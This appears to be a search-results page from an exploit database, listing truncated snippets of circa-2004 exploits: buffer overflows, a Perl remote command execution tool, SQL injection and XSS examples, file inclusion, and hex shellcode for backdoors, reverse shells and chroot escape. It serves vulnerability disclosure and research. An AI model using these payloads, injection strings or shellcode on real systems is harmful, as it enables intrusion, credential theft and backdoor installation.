3100 matches found
Ability Server 2.34 - 'APPE' Remote Buffer Overflow
/ TESTED ON WINXP SP0 RUS c by Dark Eagle from unl0ck research team http://unl0ck.void.ru HAPPY NEW YEAR! Greetz go out to: nekd0, antiq, fl0wsec setnf, nuTshell, nosystem CoKi, reflux... / include include include include // shellc0de by m00 team bind 61200 char shellcode=...
Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow
/ int overflow in ipoptionsget Copyright Georgi Guninski Cannot be used in vulnerability databases like securityfocus and mitre / include include include include include include include include include include int mainint ac,char av struct msghdr msghdr; struct iovec iovector10; int i,s; struct...
OpenText FirstClass HTTP Daemon Search DoS
Binary data 2450.prm...
pntresmailer.txt
Hello All, PnTresMailer code browser 6.03 is open to information disclosure. Authors Site: http://canvas.anubix.net +-Examples:-----+ 1 www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&fileto highlight=w00t Warning: highlightfilecodebrowserPnTM/pnTresMailer/w00t: failed to op...
phpBB 2.0.10 - Remote Command Execution (CGI)
!/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd = $CGI-param"cmd"; print...
IpbProArace 2.5.x SQL injection.
i have found an sql injection in the popular ipbproarcade mod for ipb systems 1.x and 2.x the vuln exists in the "category" field. buy using this field it is possible to inject any sql query and compemise the entire forum system p.o.c for ipb 1.x...
TWiki 20030201 search.pm Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl "tweaky.pl" v. 1.0 beta 2 Proof of concept for TWiki vulnerability. Remote code execution Vuln discovered, researched and exploited by RoMaNSoFt roman rs-labs com Madrid, 30.Sep.2004. require LWP::UserAgent; use Getopt::Long; Default config $host ...
miniBB Input Validation Hole in 'user' Parameter
No description provided by source. Example: http://target/minibb/index.php?action=userinfo&user=1%20union%20select%201,2,userpassword%20from%20minibbusers/ milw0rm.com 2004-11-16...
WinFTP Server 1.6 Denial of Service Exploit
Exploit for unknown platform in category dos / poc =========================================== WinFTP Server 1.6 Denial of Service Exploit =========================================== !/usr/local/bin/perl -w WinFTP server ver 1.6 D.o.S Exploit Discovered,exploited by KaGra Tested on WinXP SP1...
XXS in fusetalk forum
Vendor : fusetalk URL : http://www.fusetalk.com/ Version: 4.0 Risk : Cross site scripting Description: Fusetalk is a discussion forum solution that provides a powerful and simple method of web-based collaboration. Cross site scripting: The filtering script for the img src= doesnt filter " if...
blackboard.txt
Multiple vulnerabilities in BlackBoard AuThor:Cracklove emA!l:CrackloveatGmaildotCom HoMePaGe:http://ProxySky.com Info Website: http://blackboard.unclassified.de Version: 1.5.1,Maybe prior Problem: Full path disclosure,Include file Vuls 1.Full path disclosure: Let's try to request like this:...
Zanfi CMS Lite index.php inc Parameter Remote File Inclusion
The remote host is running Zanfi CMS Lite, a content management system written in PHP. There is a bug in the remote version of this software that may allow an attacker to execute arbitrary commands on the remote host by using a file inclusion bug in the file 'index.php'. An attacker may execute...
coldfusionmx61.txt
Software: Macromedia ColdFusion MX 6.1 Description: There is a vulnerability in the ColdFusion MX 6.1 product. To exploit this, a user needs access to create a cold fusion template on a ColdFusion server with CreateObject or cfobject tags enabled. The code given below writes a java class to the...
Kaspersky AntiVirus Window Caption GUI Bypass Vulnerability
I have discovered that the GUI part of KAV v5.0x kav.exe has a vulnerability that would allow any user to completely BYPASS the "password protection" in order to change settings or completely disable/exit KAV. There are dosens of shareware/freeware applications available on the internet that a us...
CFMX vulnerability
Software: Macromedia ColdFusion MX 6.1 Description: There is a vulnerability in the ColdFusion MX 6.1 product. To exploit this, a user needs access to create a cold fusion template on a ColdFusion server with CreateObject or cfobject tags enabled. The code given below writes a java class to the...
os-x/PPC create /tmp/suid 122 bytes
os-x/PPC create /tmp/suid 122 bytes. Shellcode exploit for osxppc platform / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does open; write; close; exit; See ASM below. 122 Bytes. / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd" "\x7f\xe8\x02\xa6\x39\x1f\x01\x71" "\x39\x08\xfe\xf4\x7c\xa8\x29\xa...
os-x/PPC add inetd backdoor 222 bytes
No description provided by source. / PPC OS X / Darwin Shellcode by B-r00t. 2003. open; write; close; execve; exit; See ASM below. 222 Bytes! / char shellcode = "\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7d\x48\x02\xa6\x3b\xea\x01\x70" "\x39\x60\x01\x70\x39\x1f\xff\x1b\x7c\xa8\x29\xae\x39\x1f\xff\x65"...
bsd/x86 reverse portbind 129 bytes
Exploit for bsd/x86 platform in category shellcode ================================== bsd/x86 reverse portbind 129 bytes ================================== / reverse-portshell BSD shellcode by noir / / local usage: ./reverse-shell 192.168.2.33 / / remote: nc -n -v -v -l -p 6969 / / listen on...
Google Toolbar HTML Injection
Binary data 2306.prm...
linux/x86 break chroot 34 bytes
Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 34 bytes =============================== / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD...